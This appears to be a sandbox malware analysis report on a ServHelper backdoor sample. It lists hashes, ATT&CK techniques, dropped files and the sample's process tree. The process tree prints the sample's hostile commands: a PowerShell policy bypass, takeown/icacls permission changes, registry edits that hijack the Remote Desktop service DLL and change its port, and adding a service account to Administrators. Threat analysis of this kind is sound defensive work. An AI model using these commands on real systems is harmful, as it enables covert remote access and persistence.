servhelper | ee5d82cd5e61b518572b4415797ee407cff1d28a2e0b43a2baec7236c37695eb

Analysis

max time kernel
118s
max time network
122s
platform
windows7_x64
resource
win7-20240319-en
resource tags

arch:x64arch:x86image:win7-20240319-enlocale:en-usos:windows7-x64system
submitted
05-04-2024 04:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe
Size

4.0MB
MD5

cb3cc551561883ab8fc4fb6fc837a469
SHA1

f74ae6d243342099d3fa500cbc630f4a244a8d82
SHA256

ee5d82cd5e61b518572b4415797ee407cff1d28a2e0b43a2baec7236c37695eb
SHA512

b97782f7835949ec41da357cfba598936bc2542fa53c0c8da7f35168f4f0fe19158a5946a297dcc540b7ce0dda8aeacd06f69ac209bd562e58fb31924e8fd7d1
SSDEEP

49152:MgG+0nnFa5xF1Azk6GehC1Vm6ctA6Ty0pQJb4Qate1YdM1TGHgzBut:M

Score

10^/10

servhelper backdoor discovery exploit persistence trojan

Malware Config

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Possible privilege escalation attempt 8 IoCs

exploit

pid	Process
1900	icacls.exe
2920	icacls.exe
2892	icacls.exe
3016	icacls.exe
2616	icacls.exe
1304	icacls.exe
1524	takeown.exe
2780	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2892	icacls.exe
3016	icacls.exe
2616	icacls.exe
1304	icacls.exe
1524	takeown.exe
2780	icacls.exe
1900	icacls.exe
2920	icacls.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\rfxvmt.dll	powershell.exe
File created	C:\Windows\SysWOW64\rdpclip.exe	powershell.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1368	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
2136	powershell.exe
2724	powershell.exe
2484	powershell.exe
1964	powershell.exe
2136	powershell.exe
2136	powershell.exe
2136	powershell.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
464	Process not Found

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2136	powershell.exe
Token: SeDebugPrivilege	2724	powershell.exe
Token: SeDebugPrivilege	2484	powershell.exe
Token: SeDebugPrivilege	1964	powershell.exe
Token: SeRestorePrivilege	1900	icacls.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1372 wrote to memory of 2136	1372	cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe	29
PID 1372 wrote to memory of 2136	1372	cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe	29
PID 1372 wrote to memory of 2136	1372	cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe	29
PID 1372 wrote to memory of 2136	1372	cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe	29
PID 2136 wrote to memory of 2440	2136	powershell.exe	31
PID 2136 wrote to memory of 2440	2136	powershell.exe	31
PID 2136 wrote to memory of 2440	2136	powershell.exe	31
PID 2136 wrote to memory of 2440	2136	powershell.exe	31
PID 2440 wrote to memory of 2752	2440	csc.exe	32
PID 2440 wrote to memory of 2752	2440	csc.exe	32
PID 2440 wrote to memory of 2752	2440	csc.exe	32
PID 2440 wrote to memory of 2752	2440	csc.exe	32
PID 2136 wrote to memory of 2724	2136	powershell.exe	33
PID 2136 wrote to memory of 2724	2136	powershell.exe	33
PID 2136 wrote to memory of 2724	2136	powershell.exe	33
PID 2136 wrote to memory of 2724	2136	powershell.exe	33
PID 2136 wrote to memory of 2484	2136	powershell.exe	35
PID 2136 wrote to memory of 2484	2136	powershell.exe	35
PID 2136 wrote to memory of 2484	2136	powershell.exe	35
PID 2136 wrote to memory of 2484	2136	powershell.exe	35
PID 2136 wrote to memory of 1964	2136	powershell.exe	37
PID 2136 wrote to memory of 1964	2136	powershell.exe	37
PID 2136 wrote to memory of 1964	2136	powershell.exe	37
PID 2136 wrote to memory of 1964	2136	powershell.exe	37
PID 2136 wrote to memory of 1524	2136	powershell.exe	39
PID 2136 wrote to memory of 1524	2136	powershell.exe	39
PID 2136 wrote to memory of 1524	2136	powershell.exe	39
PID 2136 wrote to memory of 1524	2136	powershell.exe	39
PID 2136 wrote to memory of 2780	2136	powershell.exe	40
PID 2136 wrote to memory of 2780	2136	powershell.exe	40
PID 2136 wrote to memory of 2780	2136	powershell.exe	40
PID 2136 wrote to memory of 2780	2136	powershell.exe	40
PID 2136 wrote to memory of 1900	2136	powershell.exe	41
PID 2136 wrote to memory of 1900	2136	powershell.exe	41
PID 2136 wrote to memory of 1900	2136	powershell.exe	41
PID 2136 wrote to memory of 1900	2136	powershell.exe	41
PID 2136 wrote to memory of 2920	2136	powershell.exe	42
PID 2136 wrote to memory of 2920	2136	powershell.exe	42
PID 2136 wrote to memory of 2920	2136	powershell.exe	42
PID 2136 wrote to memory of 2920	2136	powershell.exe	42
PID 2136 wrote to memory of 2892	2136	powershell.exe	43
PID 2136 wrote to memory of 2892	2136	powershell.exe	43
PID 2136 wrote to memory of 2892	2136	powershell.exe	43
PID 2136 wrote to memory of 2892	2136	powershell.exe	43
PID 2136 wrote to memory of 3016	2136	powershell.exe	44
PID 2136 wrote to memory of 3016	2136	powershell.exe	44
PID 2136 wrote to memory of 3016	2136	powershell.exe	44
PID 2136 wrote to memory of 3016	2136	powershell.exe	44
PID 2136 wrote to memory of 2616	2136	powershell.exe	45
PID 2136 wrote to memory of 2616	2136	powershell.exe	45
PID 2136 wrote to memory of 2616	2136	powershell.exe	45
PID 2136 wrote to memory of 2616	2136	powershell.exe	45
PID 2136 wrote to memory of 1304	2136	powershell.exe	46
PID 2136 wrote to memory of 1304	2136	powershell.exe	46
PID 2136 wrote to memory of 1304	2136	powershell.exe	46
PID 2136 wrote to memory of 1304	2136	powershell.exe	46
PID 2136 wrote to memory of 2028	2136	powershell.exe	47
PID 2136 wrote to memory of 2028	2136	powershell.exe	47
PID 2136 wrote to memory of 2028	2136	powershell.exe	47
PID 2136 wrote to memory of 2028	2136	powershell.exe	47
PID 2136 wrote to memory of 1368	2136	powershell.exe	48
PID 2136 wrote to memory of 1368	2136	powershell.exe	48
PID 2136 wrote to memory of 1368	2136	powershell.exe	48
PID 2136 wrote to memory of 1368	2136	powershell.exe	48

C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1372
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2136
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\miiif39e.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2440
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES512D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC512C.tmp"
      4⤵
      PID:2752
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2724
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2484
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1964
- - C:\Windows\SysWOW64\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1524
- - C:\Windows\SysWOW64\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2780
- - C:\Windows\SysWOW64\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1900
- - C:\Windows\SysWOW64\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2920
- - C:\Windows\SysWOW64\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2892
- - C:\Windows\SysWOW64\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3016
- - C:\Windows\SysWOW64\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2616
- - C:\Windows\SysWOW64\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1304
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:1368
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    PID:2132
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:2532
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    PID:592
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c net start rdpdr
      4⤵
      PID:700
    - - C:\Windows\SysWOW64\net.exe
        
        net start rdpdr
        5⤵
        
        PID:268
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:472
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:996
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c net start TermService
      4⤵
      PID:1180
    - - C:\Windows\SysWOW64\net.exe
        
        net start TermService
        5⤵
        
        PID:1468
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:588
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:2160
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:1336

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES512D.tmp

Filesize
1KB

MD5
8788b6193403caa021c7c5cf6763c29e

SHA1
22dcf43e9b880b7d4003567f253370f72f35df02

SHA256
0e2cbe0fedcdafb9ffb39598d200b2ad869d8ae0e6a2b6a23ebc729d1022ff3a

SHA512
c27b9d9a7ed345b32d8c7d4ea4999661dbb00abbda1ddd3cd107d3b34892d6786583f87ae705d68966d43bf7f8375590782dbee5906947d48c368d14b097ae48

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

Filesize
2.5MB

MD5
841cc93778b4ec353d0075d717b90df4

SHA1
287f652b7be199d127aab4655055654a6ea2bed6

SHA256
77f2e15c057346682081eae41389c9d91ba710c2f91107a9c59543c71cf6cad1

SHA512
a98053ebe4279d8b312a27f634ca2a9b4d929e15f8d27bdb2e89706a9fa967035e58a5d5cec2be0e5ea763b8c278884863f91d8ca270d4a30a20c51d00b72541

Download Submit
C:\Users\Admin\AppData\Local\Temp\miiif39e.dll

Filesize
3KB

MD5
39636324fcfb91371a0809ccb7bd7bee

SHA1
ea75b4ad84d3678a7539a7ba6ecfe25098190021

SHA256
7c57a3cab28ef40fa0e27352a2c15dbc0e93ff7d9cd9c0ee536289ef56120325

SHA512
4d487a2e320d80f8f3b272aad916f0b22f3174808db445badc57a2ae2ae795f4ec2b8900646db7b888ae081287e5821d775aa4656c5d11f7ccdc48caa3a1f03a

Download Submit
C:\Users\Admin\AppData\Local\Temp\miiif39e.pdb

Filesize
7KB

MD5
0d9be7b21b0ff6b81bf710252f8d32e0

SHA1
8f06ec36a8e864acbc71b4b0b315be09201c6118

SHA256
cde4cbfbc929a320a5ce636e5c748c3f10443709ed3bfdb05d1d9d474a811405

SHA512
b6867a480a58e6574f73f52b6a6ccd3fc6e17f5423345ffdd434d73d0a48f136982e9402776ffb7619aac04ed259a71581a7f5307047b65422f696c94b1aa57e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
28d9755addec05c0b24cca50dfe3a92b

SHA1
7d3156f11c7a7fb60d29809caf93101de2681aa3

SHA256
abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

SHA512
891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
59d761df839b8572fb532dc2ebaff759

SHA1
003c5670dc967077616510a47af8b64cb2fd6a7a

SHA256
f26551c790cfb3d5d0b831fcf0878e748e4a0e464f816c38ce61dd974e2ed08d

SHA512
3aaca2f1f5ef31f128c93777c812f3e6d498fe942c50ff82b045a27799e8cf7484af090cef841b879d628f54a6a2a6cc9cc1b196fd55be947107ee20c2e356bd

Download Submit
C:\Windows\SysWOW64\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC512C.tmp

Filesize
652B

MD5
9176800871f6a699d24516a99c49a645

SHA1
8248d33307217453d5877820874517f353e20aed

SHA256
c201ea9cb1e115b9ba5c50beee167ddebe98f85e4327bc74bfabd2911e1fa2cb

SHA512
77a8369552b38c5fa8c8fe2fee1b195240169416167384d30bd8844fad6806c51ce6f1ada0b6ed820a921cb4d2ed4d794d1f0030b62f5daf9146a6af08bf6ce6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\miiif39e.0.cs

Filesize
424B

MD5
9f8ab7eb0ab21443a2fe06dab341510e

SHA1
2b88b3116a79e48bab7114e18c9b9674e8a52165

SHA256
e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

SHA512
53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\miiif39e.cmdline

Filesize
309B

MD5
55cab6f59435b35b1d0cca920e0701d2

SHA1
a3faa88fea8216ad14a601c9b56b51fef9782c11

SHA256
e3976f0b919206abd33e4e424b53538987d498b9d1fea15175ce5b27c64a6408

SHA512
a092324d71bb38f6e9a1564a616ab6cff9bb230a4e5d77e824611e0a71dc7162e3b112ad5282836607ea0692b63bfa1394adc6f214fc744f3958285398c18c5a

Download Submit
memory/1372-38-0x0000000004AC0000-0x0000000004B00000-memory.dmp

Filesize
256KB

Download
memory/1372-19-0x0000000074510000-0x0000000074BFE000-memory.dmp

Filesize
6.9MB

Download
memory/1372-1-0x0000000074510000-0x0000000074BFE000-memory.dmp

Filesize
6.9MB

Download
memory/1372-0-0x0000000000280000-0x000000000068B000-memory.dmp

Filesize
4.0MB

Download
memory/1372-2-0x0000000004AC0000-0x0000000004B00000-memory.dmp

Filesize
256KB

Download
memory/1372-50-0x0000000004AC0000-0x0000000004B00000-memory.dmp

Filesize
256KB

Download
memory/1372-41-0x0000000004AC0000-0x0000000004B00000-memory.dmp

Filesize
256KB

Download
memory/1372-4-0x0000000004AC0000-0x0000000004B00000-memory.dmp

Filesize
256KB

Download
memory/1372-32-0x0000000004AC0000-0x0000000004B00000-memory.dmp

Filesize
256KB

Download
memory/1372-3-0x0000000004F00000-0x0000000005304000-memory.dmp

Filesize
4.0MB

Download
memory/1964-63-0x0000000002800000-0x0000000002840000-memory.dmp

Filesize
256KB

Download
memory/1964-66-0x0000000002800000-0x0000000002840000-memory.dmp

Filesize
256KB

Download
memory/1964-61-0x000000006F4A0000-0x000000006FA4B000-memory.dmp

Filesize
5.7MB

Download
memory/1964-64-0x000000006F4A0000-0x000000006FA4B000-memory.dmp

Filesize
5.7MB

Download
memory/1964-65-0x0000000002800000-0x0000000002840000-memory.dmp

Filesize
256KB

Download
memory/1964-67-0x000000006F4A0000-0x000000006FA4B000-memory.dmp

Filesize
5.7MB

Download
memory/2136-10-0x000000006F4A0000-0x000000006FA4B000-memory.dmp

Filesize
5.7MB

Download
memory/2136-12-0x0000000002650000-0x0000000002690000-memory.dmp

Filesize
256KB

Download
memory/2136-69-0x0000000002650000-0x0000000002690000-memory.dmp

Filesize
256KB

Download
memory/2136-9-0x000000006F4A0000-0x000000006FA4B000-memory.dmp

Filesize
5.7MB

Download
memory/2136-53-0x000000006F4A0000-0x000000006FA4B000-memory.dmp

Filesize
5.7MB

Download
memory/2136-62-0x000000006F4A0000-0x000000006FA4B000-memory.dmp

Filesize
5.7MB

Download
memory/2136-11-0x0000000002650000-0x0000000002690000-memory.dmp

Filesize
256KB

Download
memory/2440-20-0x0000000000520000-0x0000000000560000-memory.dmp

Filesize
256KB

Download
memory/2484-49-0x000000006F4A0000-0x000000006FA4B000-memory.dmp

Filesize
5.7MB

Download
memory/2484-54-0x000000006F4A0000-0x000000006FA4B000-memory.dmp

Filesize
5.7MB

Download
memory/2484-52-0x000000006F4A0000-0x000000006FA4B000-memory.dmp

Filesize
5.7MB

Download
memory/2484-51-0x00000000028B0000-0x00000000028F0000-memory.dmp

Filesize
256KB

Download
memory/2724-39-0x000000006F4A0000-0x000000006FA4B000-memory.dmp

Filesize
5.7MB

Download
memory/2724-43-0x000000006F4A0000-0x000000006FA4B000-memory.dmp

Filesize
5.7MB

Download
memory/2724-42-0x0000000002570000-0x00000000025B0000-memory.dmp

Filesize
256KB

Download
memory/2724-40-0x000000006F4A0000-0x000000006FA4B000-memory.dmp

Filesize
5.7MB

Download